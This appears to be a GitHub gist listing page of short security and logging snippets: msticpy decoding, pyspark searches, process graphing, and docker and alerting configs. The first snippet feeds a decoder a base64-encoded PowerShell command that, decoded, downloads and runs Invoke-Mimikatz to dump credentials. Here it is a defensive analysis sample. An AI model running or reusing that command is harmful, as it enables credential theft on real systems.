Skip to content

Instantly share code, notes, and snippets.

Avatar

boredhackerblog BoredHackerBlog

View GitHub Profile
@BoredHackerBlog
BoredHackerBlog / msticpy_b64_unpack.py
Last active May 17, 2022
base64 command line arg decoding with msticpy
View msticpy_b64_unpack.py
from msticpy.nbtools import *
from msticpy.sectools import *
command = "powershell -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AQgBDAC0AUwBFAEMAVQBSAEkAVABZAC8ARQBtAHAAaQByAGUALwBtAGEAcwB0AGUAcgAvAGUAbQBwAGkAcgBlAC8AcwBlAHIAdgBlAHIALwBkAGEAdABhAC8AbQBvAGQAdQBsAGUAXwBzAG8AdQByAGMAZQAvAGMAcgBlAGQAZQBuAHQAaQBhAGwAcwAvAEkAbgB2AG8AawBlAC0ATQBpAG0AaQBrAGEAdAB6AC4AcABzADEAIgApADsAIABJAG4AdgBvAGsAZQAtAE0AaQBtAGkAawBhAHQAegAgAC0AQwBvAG0AbQBhAG4AZAAgAHAAcgBpAHYAaQBsAGUAZwBlADoAOgBkAGUAYgB1AGcAOwAgAEkAbgB2AG8AawBlAC0ATQBpAG0AaQBrAGEAdAB6ACAALQBEAHUAbQBwAEMAcgBlAGQAcwA7AA=="
out = base64.unpack(command)
print(out[1]['decoded_string'][0])
# it should print
@BoredHackerBlog
BoredHackerBlog / pyspark_search.py
Last active Apr 30, 2022
apache spark / pyspark eve.json search
View pyspark_search.py
In [1]: from pyspark.sql import SparkSession
In [2]: spark = SparkSession \
...: .builder \
...: .appName("example") \
...: .getOrCreate()
22/04/29 18:55:18 WARN Utils: Your hostname, ubuntu resolves to a loopback address: 127.0.1.1; using 192.168.95.155 instead (on interface ens33)
22/04/29 18:55:18 WARN Utils: Set SPARK_LOCAL_IP if you need to bind to another address
Using Spark's default log4j profile: org/apache/spark/log4j-defaults.properties
Setting default log level to "WARN".
@BoredHackerBlog
BoredHackerBlog / graph_proc.py
Created Feb 1, 2022
process graph using graphviz and python
View graph_proc.py
from graphviz import Digraph
process_data = []
process_data.append({"pid":"1", "ppid":"204", "path":"c:/cmd.exe"})
process_data.append({"pid":"4", "ppid":"204", "path":"c:/powershell.exe"})
process_data.append({"pid":"204", "ppid":"0", "path":"c:/svhost.exe"})
process_data.append({"pid":"8", "ppid":"4", "path":"c:/net.exe"})
process_data.append({"pid":"10", "ppid":"4", "path":"c:/netsh.exe"})
def graph_process(jsonarray, pid_key, ppid_key, label_key):
@BoredHackerBlog
BoredHackerBlog / ghactions_docker_build.yaml
Last active Feb 1, 2022
github actions for docker containers
View ghactions_docker_build.yaml
name: build and upload container
on:
push:
branches: [ main ]
jobs:
build:
runs-on: ubuntu-latest
View set_token.py
import requests
from time import sleep
while True:
try:
if requests.get("http://localhost:8080").status_code == 200:
break
else:
sleep(5)
except:
View docker-compose.yaml
#taken from here: https://github.com/immauss/openvas/blob/master/compose/docker-compose.yml
#as of jan 9th 2022, it works fine. takes some time to download feeds initially.
version: "3"
services:
openvas:
ports:
- "8080:9392"
environment:
- "PASSWORD=admin"
- "USERNAME=admin"
@BoredHackerBlog
BoredHackerBlog / docker-compose.yaml
Last active Mar 22, 2022
grafana loki docker-compose file and vector settings
View docker-compose.yaml
version: "3"
networks:
loki:
services:
loki:
image: grafana/loki:2.4.0
volumes:
- ./loki:/etc/loki
View alert_app.py
from flask import request
from flask import Flask
import opsgenie_sdk
app = Flask(__name__)
og = opsgenie_sdk.configuration.Configuration()
og.api_key['Authorization'] = ""
og.api_client = opsgenie_sdk.api_client.ApiClient(configuration=og)
og.alert_api = opsgenie_sdk.AlertApi(api_client=og.api_client)
@BoredHackerBlog
BoredHackerBlog / 01-netcfg.yaml
Created Sep 12, 2021
netplan config for bridge, br0 can be used to sniff traffic between eth1, eth2
View 01-netcfg.yaml
# root@host:~# cat /etc/netplan/01-netcfg.yaml
network:
version: 2
renderer: networkd
ethernets:
eth0:
dhcp4: yes
eth1:
dhcp4: no
eth2:
@BoredHackerBlog
BoredHackerBlog / rulematch.py
Created Sep 4, 2021
dict rule match - this code essentially takes in a bunch of rules and compares them against an event (dict) and prints if something matches
View rulematch.py
# requires dictquery (pip3 install dictquery or get it from here: https://github.com/cyberlis/dictquery)
import dictquery as dq
#each rule needs to be a new line
#rule format, RULENAME|RULE
#rule syntax: https://github.com/cyberlis/dictquery#dictquery
rules_file = "rules.txt"
rules = {}